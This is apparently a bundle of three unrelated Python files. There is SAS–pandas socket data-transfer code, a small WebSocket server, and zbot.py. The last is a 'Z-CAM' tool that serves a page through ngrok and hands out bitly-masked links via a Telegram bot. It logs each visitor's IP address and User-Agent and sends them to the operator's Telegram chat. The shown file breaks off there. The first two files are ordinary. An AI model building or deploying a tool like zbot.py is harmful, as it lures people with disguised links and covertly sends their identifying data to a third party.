print("error occured in SAS during data transfer. Check the LOG for issues.")
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ssock = newsock[0]
logf = b''
first = True
fail = False
blksz = int(kwargs.get('blocksize', 32767))
row_num = 0
code = ""
for row in df.itertuples(index=False):
row_num += 1
card = ""
for col in range(ncols):
var = str(row[col])
if dts[col] == 'N' and var == 'nan':
var = '.'
elif dts[col] == 'C':
if var == 'nan' or len(var) == 0:
var = ' '
else:
var = var.replace(colsep, colrep)
elif dts[col] == 'B':
var = str(int(row[col]))
elif dts[col] == 'D':
if var in ['nan', 'NaT', 'NaN']:
var = '.'
else:
var = str(row[col].to_datetime64())[:26]
card += var
if col < (ncols-1):
card += colsep
if embedded_newlines:
card = card.replace(LF, colrep).replace(CR, colrep)
card = card.replace('\n', LF).replace('\r', CR)
code += card+"\n"
if len(code) > blksz:
first = False
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
ll = self.submit("", 'text')
print("Transcoding error encountered. Data transfer stopped on or before row "+str(row_num))
print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
sent = 0
send = len(code)
blen = send
while send:
try:
sent = 0
sent = ssock.send(code[blen-send:blen])
except (BlockingIOError):
pass
except (OSError) as e:
if fail:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
print("Failed connecting to server socket. Check the SASLOG to see the error")
ll = self.submit("", 'text')
return row_num
fail = True
if server:
sock.close()
sock = socks.socket()
sock.connect((host, port))
ssock = sock
sleep(1)
pass
send -= sent
code = ""
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
if len(code):
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
print("Transcoding error encountered. Data transfer stopped on row "+str(row_num))
print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
sent = 0
send = len(code)
blen = send
while send:
try:
sent = 0
sent = ssock.send(code[blen-send:blen])
except (BlockingIOError):
pass
except (OSError) as e:
print('first')
if not first:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
print("Failed connecting to server socket. Check the SASLOG to see the error")
ll = self.submit("", 'text')
return row_num
first = False
if server:
sock.close()
sock = socks.socket()
sock.connect((host, port))
ssock = sock
sleep(1)
pass
send -= sent
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
return None
def dataframe2sasdataORIG(self, df: '<Pandas Data Frame object>', table: str ='a',
libref: str ="", keep_outer_quotes: bool=False,
embedded_newlines: bool=True,
LF: str = '\x01', CR: str = '\x02',
colsep: str = '\x03', colrep: str = ' ',
datetimes: dict={}, outfmts: dict={}, labels: dict={},
outdsopts: dict={}, encode_errors = None, char_lengths = None,
**kwargs):
"""
This method imports a Pandas Data Frame to a SAS Data Set, returning the SASdata object for the new Data Set.
df - Pandas Data Frame to import to a SAS Data Set
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
keep_outer_quotes - for character columns, have SAS keep any outer quotes instead of stripping them off.
embedded_newlines - if any char columns have embedded CR or LF, set this to True to get them iported into the SAS data set
LF - if embedded_newlines=True, the chacter to use for LF when transferring the data; defaults to '\x01'
CR - if embedded_newlines=True, the chacter to use for CR when transferring the data; defaults to '\x02'
colsep - the column seperator character used for streaming the delimmited data to SAS defaults to '\x03'
datetimes - dict with column names as keys and values of 'date' or 'time' to create SAS date or times instead of datetimes
outfmts - dict with column names and SAS formats to assign to the new SAS data set
labels - dict with column names and SAS Labels to assign to the new SAS data set
outdsopts - a dictionary containing output data set options for the table being created
encode_errors - 'fail' or 'replace' - default is to 'fail', other choice is to 'replace' invalid chars with the replacement char
char_lengths - How to determine (and declare) lengths for CHAR variables in the output SAS data set
"""
input = ""
xlate = ""
card = ""
format = ""
length = ""
label = ""
dts = []
ncols = len(df.columns)
lf = "'"+'%02x' % ord(LF.encode(self.sascfg.encoding))+"'x"
cr = "'"+'%02x' % ord(CR.encode(self.sascfg.encoding))+"'x "
delim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x "
dtkeys = datetimes.keys()
fmtkeys = outfmts.keys()
labkeys = labels.keys()
if encode_errors is None:
encode_errors = 'fail'
bpc = self._sb.pyenc[0]
if char_lengths and str(char_lengths).strip() in ['1','2','3','4']:
bpc = int(char_lengths)
if char_lengths and str(char_lengths) == 'exact':
CnotB = False
else:
CnotB = bpc == 1
if type(char_lengths) is not dict:
charlens = self._sb.df_char_lengths(df, encode_errors, char_lengths)
else:
charlens = char_lengths
if charlens is None:
return -1
charlens = {k.upper():v for k,v in charlens.items()}
for name in df.columns:
colname = str(name)
input += "'"+colname+"'n "
if colname in labkeys:
label += "label '"+colname+"'n ="+labels[colname]+";\n"
if df.dtypes[name].kind in ('O','S','U','V'):
try:
length += " '"+colname+"'n $"+str(charlens[colname.upper()])
except KeyError as e:
print("Dictionary provided as char_lengths is missing column: "+colname)
raise e
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
if keep_outer_quotes:
input += "~ "
dts.append('C')
if embedded_newlines:
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0A'x, "+lf+");\n"
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0D'x, "+cr+");\n"
else:
if df.dtypes[name].kind in ('M'):
length += " '"+colname+"'n 8"
input += ":B8601DT26.6 "
if colname not in dtkeys:
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DT26.6 "
else:
if datetimes[colname].lower() == 'date':
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DA. "
xlate += " '"+colname+"'n = datepart('"+colname+"'n);\n"
else:
if datetimes[colname].lower() == 'time':
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601TM. "
xlate += " '"+colname+"'n = timepart('"+colname+"'n);\n"
else:
print("invalid value for datetimes for column "+colname+". Using default.")
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
else:
format += "'"+colname+"'n E8601DT26.6 "
dts.append('D')
else:
length += " '"+colname+"'n 8"
if colname in fmtkeys:
format += "'"+colname+"'n "+outfmts[colname]+" "
if df.dtypes[name] == 'bool':
dts.append('B')
else:
dts.append('N')
code = "data "
if len(libref):
code += libref+"."
code += "'"+table.strip()+"'n"
if len(outdsopts):
code += '('
for key in outdsopts:
code += key+'='+str(outdsopts[key]) + ' '
code += ");\n"
else:
code += ";\n"
if len(length):
code += "length"+length+";\n"
if len(format):
code += "format "+format+";\n"
code += label
code += "infile datalines delimiter="+delim+" STOPOVER;\ninput @;\nif _infile_ = '' then delete;\n"
code += "else do;\n input "+input+";\n"+xlate+";\nend;\ndatalines4;"
self._asubmit(code, "text")
logf = b''
blksz = int(kwargs.get('blocksize', 32767))
row_num = 0
code = ""
for row in df.itertuples(index=False):
row_num += 1
card = ""
for col in range(ncols):
var = str(row[col])
if dts[col] == 'N' and var == 'nan':
var = '.'
elif dts[col] == 'C':
if var == 'nan' or len(var) == 0:
var = ' '
else:
var = var.replace(colsep, colrep)
elif dts[col] == 'B':
var = str(int(row[col]))
elif dts[col] == 'D':
if var in ['nan', 'NaT', 'NaN']:
var = '.'
else:
var = str(row[col].to_datetime64())[:26]
card += var
if col < (ncols-1):
card += colsep
if embedded_newlines:
card = card.replace(LF, colrep).replace(CR, colrep)
card = card.replace('\n', LF).replace('\r', CR)
code += card+"\n"
if len(code) > blksz:
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
print("Transcoding error encountered. Data transfer stopped on or before row "+str(row_num))
print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
#self.stdin.write(code+b'\n')
os.write(self.pin, code+b'\n')
self.stdin.flush()
code = ""
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
if len(code):
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
print("Transcoding error encountered. Data transfer stopped on row "+str(row_num))
print("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
#self.stdin.write(code+b'\n')
os.write(self.pin, code+b'\n')
self.stdin.flush()
self._asubmit(";;;;\n;;;;", "text")
ll = self.submit("quit;", 'text')
return None
def sasdata2dataframe(self, table: str, libref: str ='', dsopts: dict = None,
rowsep: str = '\x01', colsep: str = '\x02',
rowrep: str = ' ', colrep: str = ' ',
port: int=0, wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
"""
This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
table - the name of the SAS Data Set you want to export to a Pandas Data Frame
libref - the libref for the SAS Data Set.
rowsep - the row seperator character to use; defaults to '\x01'
colsep - the column seperator character to use; defaults to '\x02'
rowrep - the char to convert to for any embedded rowsep chars, defaults to ' '
colrep - the char to convert to for any embedded colsep chars, defaults to ' '
port - port to use for socket. Defaults to 0 which uses a random available ephemeral port
wait - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout
"""
dsopts = dsopts if dsopts is not None else {}
method = kwargs.pop('method', None)
if method and method.lower() == 'csv':
return self.sasdata2dataframeCSV(table, libref, dsopts, port=port, wait=wait, **kwargs)
#elif method and method.lower() == 'disk':
else:
return self.sasdata2dataframeDISK(table, libref, dsopts, rowsep, colsep,
rowrep, colrep, port=port, wait=wait, **kwargs)
def sasdata2dataframeCSV(self, table: str, libref: str ='', dsopts: dict = None, opts: dict = None,
port: int=0, wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
"""
This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
table - the name of the SAS Data Set you want to export to a Pandas Data Frame
libref - the libref for the SAS Data Set.
dsopts - data set options for the input SAS Data Set
opts - a dictionary containing any of the following Proc Export options(delimiter, putnames)
tempfile - DEPRECATED
tempkeep - DEPRECATED
port - port to use for socket. Defaults to 0 which uses a random available ephemeral port
wait - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout
These two options are for advanced usage. They override how saspy imports data. For more info
see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques
dtype - this is the parameter to Pandas read_csv, overriding what saspy generates and uses
my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=
"""
tmp = kwargs.pop('tempfile', None)
tmp = kwargs.pop('tempkeep', None)
dsopts = dsopts if dsopts is not None else {}
opts = opts if opts is not None else {}
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if libref:
tabname = libref+".'"+table.strip()+"'n "
else:
tabname = "'"+table.strip()+"'n "
code = "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";run;\n"
code += "data _null_; file STDERR;d = open('work.sasdata2dataframe');\n"
code += "lrecl = attrn(d, 'LRECL'); nvars = attrn(d, 'NVARS');\n"
code += "lr='LRECL='; vn='VARNUMS='; vl='VARLIST='; vt='VARTYPE=';\n"
code += "put lr lrecl; put vn nvars; put vl;\n"
code += "do i = 1 to nvars; var = varname(d, i); put var; end;\n"
code += "put vt;\n"
code += "do i = 1 to nvars; var = vartype(d, i); put var; end;\n"
code += "run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("LRECL= ")
l2 = l2[2].partition("\n")
lrecl = int(l2[0])
l2 = l2[2].partition("VARNUMS= ")
l2 = l2[2].partition("\n")
nvars = int(l2[0])
l2 = l2[2].partition("\n")
varlist = l2[2].split("\n", nvars)
del varlist[nvars]
l2 = l2[2].partition("VARTYPE=")
l2 = l2[2].partition("\n")
vartype = l2[2].split("\n", nvars)
del vartype[nvars]
topts = dict(dsopts)
topts.pop('firstobs', None)
topts.pop('obs', None)
code = "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
code += "data work._n_u_l_l_;output;run;\n"
code += "data _null_; file STDERR; set work._n_u_l_l_ "+tabname+self._sb._dsopts(topts)+";put 'FMT_CATS=';\n"
for i in range(nvars):
code += "_tom = vformatn('"+varlist[i]+"'n);put _tom;\n"
code += "stop;\nrun;\nproc delete data=work._n_u_l_l_;run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("FMT_CATS=")
l2 = l2[2].partition("\n")
varcat = l2[2].split("\n", nvars)
del varcat[nvars]
try:
sock = socks.socket()
if not self.sascfg.ssh or self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
print('Error try to open a socket in the sasdata2dataframe method. Call failed.')
return None
if self.sascfg.ssh and not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
code = "filename sock socket '"+host+":"+str(port)+"' lrecl="+str(self.sascfg.lrecl)+" recfm=v encoding='utf-8';\n"
code += "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";\nformat "
idx_col = kwargs.pop('index_col', False)
eng = kwargs.pop('engine', 'c')
my_fmts = kwargs.pop('my_fmts', False)
k_dts = kwargs.pop('dtype', None)
if k_dts is None and my_fmts:
print("my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.")
my_fmts = False
if not my_fmts:
for i in range(nvars):
if vartype[i] == 'N':
code += "'"+varlist[i]+"'n "
if varcat[i] in self._sb.sas_date_fmts:
code += 'E8601DA10. '
else:
if varcat[i] in self._sb.sas_time_fmts:
code += 'E8601TM15.6 '
else:
if varcat[i] in self._sb.sas_datetime_fmts:
code += 'E8601DT26.6 '
else:
code += 'best32. '
code += ";\n run;\n"
ll = self.submit(code, "text")
if k_dts is None:
dts = {}
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
dts[varlist[i]] = 'float'
else:
dts[varlist[i]] = 'str'
else:
dts[varlist[i]] = 'str'
else:
dts = k_dts
code = ''
code = "proc export data=work.sasdata2dataframe outfile=sock dbms=csv replace;\n"
code += self._sb._expopts(opts)+" run;\n"
code += "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
sock.listen(1)
self._asubmit(code, 'text')
if wait > 0 and sel.select([sock],[],[],wait)[0] == []:
print("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
sock.close()
ll = self.submit("", 'text')
return ll['LOG']
newsock = (0,0)
try:
newsock = sock.accept()
sockout = _read_sock(newsock=newsock, rowsep=b'\n')
df = pd.read_csv(sockout, index_col=idx_col, encoding='utf8', engine=eng, dtype=dts, **kwargs)
except (KeyboardInterrupt, Exception) as e:
print("sasdata2dataframe was interupted. Trying to return the saslog instead of a data frame.")
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
return str(e)+"\n\n"+ll['LOG']
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
ll = self.submit("", 'text')
if k_dts is None: # don't override these if user provided their own dtypes
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
df[varlist[i]] = pd.to_datetime(df[varlist[i]], errors='coerce')
return df
def sasdata2dataframeDISK(self, table: str, libref: str ='', dsopts: dict = None,
rowsep: str = '\x01', colsep: str = '\x02',
rowrep: str = ' ', colrep: str = ' ', port: int=0,
wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
"""
This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
table - the name of the SAS Data Set you want to export to a Pandas Data Frame
libref - the libref for the SAS Data Set.
dsopts - data set options for the input SAS Data Set
rowsep - the row seperator character to use; defaults to '\x01'
colsep - the column seperator character to use; defaults to '\x02'
rowrep - the char to convert to for any embedded rowsep chars, defaults to ' '
colrep - the char to convert to for any embedded colsep chars, defaults to ' '
tempfile - DEPRECATED
tempkeep - DEPRECATED
port - port to use for socket. Defaults to 0 which uses a random available ephemeral port
wait - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout
These two options are for advanced usage. They override how saspy imports data. For more info
see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques
dtype - this is the parameter to Pandas read_csv, overriding what saspy generates and uses
my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=
"""
tmp = kwargs.pop('tempfile', None)
tmp = kwargs.pop('tempkeep', None)
dsopts = dsopts if dsopts is not None else {}
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if libref:
tabname = libref+".'"+table.strip()+"'n "
else:
tabname = "'"+table.strip()+"'n "
code = "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";run;\n"
code += "data _null_; file STDERR;d = open('work.sasdata2dataframe');\n"
code += "lrecl = attrn(d, 'LRECL'); nvars = attrn(d, 'NVARS');\n"
code += "lr='LRECL='; vn='VARNUMS='; vl='VARLIST='; vt='VARTYPE=';\n"
code += "put lr lrecl; put vn nvars; put vl;\n"
code += "do i = 1 to nvars; var = varname(d, i); put var; end;\n"
code += "put vt;\n"
code += "do i = 1 to nvars; var = vartype(d, i); put var; end;\n"
code += "run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("LRECL= ")
l2 = l2[2].partition("\n")
lrecl = int(l2[0])
l2 = l2[2].partition("VARNUMS= ")
l2 = l2[2].partition("\n")
nvars = int(l2[0])
l2 = l2[2].partition("\n")
varlist = l2[2].split("\n", nvars)
del varlist[nvars]
l2 = l2[2].partition("VARTYPE=")
l2 = l2[2].partition("\n")
vartype = l2[2].split("\n", nvars)
del vartype[nvars]
topts = dict(dsopts)
topts.pop('firstobs', None)
topts.pop('obs', None)
code = "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
code += "data work._n_u_l_l_;output;run;\n"
code += "data _null_; file STDERR; set work._n_u_l_l_ "+tabname+self._sb._dsopts(topts)+";put 'FMT_CATS=';\n"
for i in range(nvars):
code += "_tom = vformatn('"+varlist[i]+"'n);put _tom;\n"
code += "stop;\nrun;\nproc delete data=work._n_u_l_l_;run;"
ll = self.submit(code, "text")
l2 = ll['LOG'].rpartition("FMT_CATS=")
l2 = l2[2].partition("\n")
varcat = l2[2].split("\n", nvars)
del varcat[nvars]
try:
sock = socks.socket()
if not self.sascfg.ssh or self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
print('Error try to open a socket in the sasdata2dataframe method. Call failed.')
return None
if self.sascfg.ssh and not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
code = "filename sock socket '"+host+":"+str(port)+"' recfm=s encoding='utf-8';\n"
rdelim = "'"+'%02x' % ord(rowsep.encode(self.sascfg.encoding))+"'x"
cdelim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x"
idx_col = kwargs.pop('index_col', False)
eng = kwargs.pop('engine', 'c')
my_fmts = kwargs.pop('my_fmts', False)
k_dts = kwargs.pop('dtype', None)
if k_dts is None and my_fmts:
print("my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.")
my_fmts = False
code += "data _null_; set "+tabname+self._sb._dsopts(dsopts)+";\n"
if not my_fmts:
for i in range(nvars):
if vartype[i] == 'N':
code += "format '"+varlist[i]+"'n "
if varcat[i] in self._sb.sas_date_fmts:
code += 'E8601DA10.'
else:
if varcat[i] in self._sb.sas_time_fmts:
code += 'E8601TM15.6'
else:
if varcat[i] in self._sb.sas_datetime_fmts:
code += 'E8601DT26.6'
else:
code += 'best32.'
code += '; '
if i % 10 == 9:
code +='\n'
miss = {}
code += "\nfile sock dlm="+cdelim+";\n"
for i in range(nvars):
if vartype[i] != 'N':
code += "'"+varlist[i]+"'n = translate('"
code += varlist[i]+"'n, '{}'x, '{}'x); ".format( \
'%02x%02x' % \
(ord(rowrep.encode(self.sascfg.encoding)), \
ord(colrep.encode(self.sascfg.encoding))),
'%02x%02x' % \
(ord(rowsep.encode(self.sascfg.encoding)), \
ord(colsep.encode(self.sascfg.encoding))))
miss[varlist[i]] = ' '
else:
code += "if missing('"+varlist[i]+"'n) then '"+varlist[i]+"'n = '.'; "
miss[varlist[i]] = '.'
if i % 10 == 9:
code +='\n'
code += "\nput "
for i in range(nvars):
code += " '"+varlist[i]+"'n "
if i % 10 == 9:
code +='\n'
code += rdelim+";\nrun;"
if k_dts is None:
dts = {}
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
dts[varlist[i]] = 'float'
else:
dts[varlist[i]] = 'str'
else:
dts[varlist[i]] = 'str'
else:
dts = k_dts
quoting = kwargs.pop('quoting', 3)
sock.listen(1)
self._asubmit(code, 'text')
if wait > 0 and sel.select([sock],[],[],wait)[0] == []:
print("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
sock.close()
ll = self.submit("", 'text')
return ll['LOG']
newsock = (0,0)
try:
newsock = sock.accept()
sockout = _read_sock(newsock=newsock, rowsep=rowsep.encode())
df = pd.read_csv(sockout, index_col=idx_col, engine=eng, header=None, names=varlist,
sep=colsep, lineterminator=rowsep, dtype=dts, na_values=miss,
encoding='utf8', quoting=quoting, **kwargs)
except (KeyboardInterrupt, Exception) as e:
print(e)
print("sasdata2dataframe was interupted. Trying to return the saslog instead of a data frame.")
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
return str(e)+"\n\n"+ll['LOG']
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
ll = self.submit("", 'text')
if k_dts is None: # don't override these if user provided their own dtypes
for i in range(nvars):
if vartype[i] == 'N':
if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
df[varlist[i]] = pd.to_datetime(df[varlist[i]], errors='coerce')
return df
class _read_sock(io.StringIO):
def __init__(self, **kwargs):
self.newsock = kwargs.get('newsock')
self.rowsep = kwargs.get('rowsep')
self.datar = b""
def read(self, size=4096):
datl = 0
size = max(size, 4096)
notarow = True
while datl < size or notarow:
data = self.newsock[0].recv(size)
dl = len(data)
if dl:
datl += dl
self.datar += data
if notarow:
notarow = self.datar.count(self.rowsep) <= 0
else:
if len(self.datar) <= 0:
return ''
else:
break
data = self.datar.rpartition(self.rowsep)
datap = data[0]+data[1]
self.datar = data[2]
return datap.decode()
|
server.py | from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
import threading
class _Client(WebSocket):
def handleMessage(self):
thr=threading.Thread(target=self.process_message,args=(),kwargs={})
thr.deamon=True
thr.start()
def handleConnected(self):
self.WS.on_client_connect(self)
def handleClose(self):
self.WS.on_client_close(self)
def process_message(self,*args):
msg=self.data
self.sendMessage("null")
r=self.WS._p(msg)
if (r!="null"):
self.sendMessage(r)
def send_message(self,m):
self.sendMessage(m)
class _BaseWS(SimpleWebSocketServer):
def _constructWebSocket(self,s,a):
c=self.websocketclass(self,s,a)
c.WS=self.WS
c.ID=self.WS._n_id()
return c
class WS:
def __init__(self,a):
self._s=_BaseWS(a[0],a[1],_Client)
self._s.WS=self
self._a=a
self.packets={}
self._s_thr=None
self._c_id=0
def start(self):
print("WS (addr: "+self._a[0]+" port: "+self._a[1]+")")
def f():
self._s.serveforever()
self._s_thr=threading.Thread(target=f,args=(),kwargs={})
self._s_thr.start()
def _p(self,m):
k=m.split(":")[0]
v=m[len(k)+1:]
if (k not in self.packets.keys()):
self.on_error("Invalid packet!")
return "null"
return self.packets[k](v)
def _n_id(self):
self._c_id+=1
return self._c_id-1
def on_client_connect(self,c):
pass
def on_client_close(self,c):
pass
def on_error(self,e):
print(e)
self._s.close()
def packets(self):
return self.packets
def add_packet(self,k,f):
self.packets[k]=f
def clients(self):
c=[]
for cl in self._s.connections.items():
c.apend(cl[1])
return c
def get_client(self,id_):
for c in self.clients():
if (c.ID==id_):return c
return None
|
zbot.py | #!/usr/bin/python3
from telebot import types
import telebot
from constraints import API_KEY, BITLY_ACCESS_TOKEN, ngrok_auth_token
import threading
from flask import Flask, render_template, request
from datetime import datetime
import base64
import os
from pyngrok import ngrok
import pyfiglet
import logging
import pyshorteners
import requests
try:
# telegram
bot = telebot.TeleBot(API_KEY, parse_mode=None)
# bitly
s = pyshorteners.Shortener(api_key=BITLY_ACCESS_TOKEN)
# colors
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
# banner
result = pyfiglet.figlet_format("Z-CAM")
print(f"{bcolors.OKBLUE}{result}{bcolors.ENDC}")
print(f"\t\t\t {bcolors.BOLD}Github: @sankethj{bcolors.ENDC}")
print("")
# disable unwanted logs
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
os.environ["FLASK_ENV"] = "development"
app = Flask(__name__)
app.debug = False
fport = 5000
# webhook port
PORT = int(os.environ.get('PORT', 5000))
# ngrok auth-token
ngrok.set_auth_token(ngrok_auth_token)
public_url = ngrok.connect(fport).public_url
final_ngrok = public_url[:4] + "s" + public_url[4:]
# telegram bot building
@bot.message_handler(commands=["link"])
def send_link_and_image(msg):
bot.reply_to(msg, final_ngrok)
global user_id
user_id = msg.chat.id
@bot.message_handler(commands=["shorten_link"])
def send_shortend_link(msg):
s_final_ngrok = s.bitly.short(final_ngrok)
bot.reply_to(msg, s_final_ngrok)
global user_id
user_id = msg.chat.id
@bot.message_handler(commands=["start"])
def send_start_message(msg):
bot.reply_to(msg,"Welcome.....ZCam tool is for Eductaional purpose only. Use /help for more info. Support @Team_ETF for more..... JOIN: https://youtube.com/channel/UCJnx0yDhcTLWM3ZrAtSvaIw")
global user_id
user_id = msg.chat.id
@bot.message_handler(commands=["help"])
def send_help_message(msg):
bot.reply_to(msg,"Use /menu for menu window. Use /link to get ngrok link. Use /shorten_link to get bitly masked link.")
global user_id
user_id = msg.chat.id
@bot.message_handler(commands=["menu"])
def show_menu_page(msg):
markup = types.ReplyKeyboardMarkup(row_width=1)
btn1 = types.KeyboardButton("/start")
btn2 = types.KeyboardButton("/link")
btn3 = types.KeyboardButton("/shorten_link")
btn4 = types.KeyboardButton("/help")
markup.add(btn1,btn2,btn3,btn4)
bot.send_message(chat_id=msg.chat.id, text="Choose from menu", reply_markup=markup)
global user_id
user_id = msg.chat.id
#final ngrok link
print(f" * ngrok tunnel link -> {bcolors.OKCYAN}{final_ngrok}{bcolors.ENDC}")
app.config["BASE_URL"] = public_url
# flask
@app.route("/",methods=['POST','GET'])
def home():
# get request
if request.method == 'GET':
now = str(datetime.now())
req = requests.get('http://localhost:4040/api/requests/http').json()
user_agent = req['requests'][0]['request']['headers']['User-Agent'][0]
ip_address = req['requests'][0]['request']['headers']['X-Forwarded-For'][0]
# writing file
file1 = open('myfile.txt', 'a')
file1.write("Date and Time:\t")
file1.write(str(now))
file1.write("\nIP:\t")
file1.write(str(ip_address))
file1.write("\nUser-Agent:\t")
file1.write(str(user_agent))
file1.write("\n\n")
file1.close()
# sending log message to telegram bot
log_msg = "Time: "+ str(now) +" "+"IP_ADDRESS: "+ str(ip_address) +" "+"USER-AGENT: "+ str(user_agent)
to_url2 = "https://api.telegram.org/bot"+ API_KEY +"/sendMessage?chat_id="+ str(user_id) +"&text="+ str(log_msg)
requests.get(to_url2)
